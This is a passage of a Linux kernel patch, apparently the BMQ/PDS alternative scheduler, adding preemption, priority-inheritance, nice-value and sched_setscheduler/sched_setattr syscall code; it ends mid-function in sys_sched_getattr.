++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note, that this is called and return with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is loads of tricky to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a nono in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task is
++	 * not SCHED_NORMAL/SCHED_BATCH:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy         return value   kernel prio    user prio/nice
++ *
++ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
++ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * allow normal nice value to be set, but will not have any
++	 * effect on scheduling until the task not SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * IF use task_access_lock() here:
++	 * For the task p which is not running, reading rq->stop is
++	 * racy but acceptable as ->stop doesn't change much.
++	 * An enhancemnet can be made to read rq->stop saftly.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads its a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboost
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ *
++ * Return: 0 on success. An error code otherwise.
++ * @param: structure containing the new RT priority.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
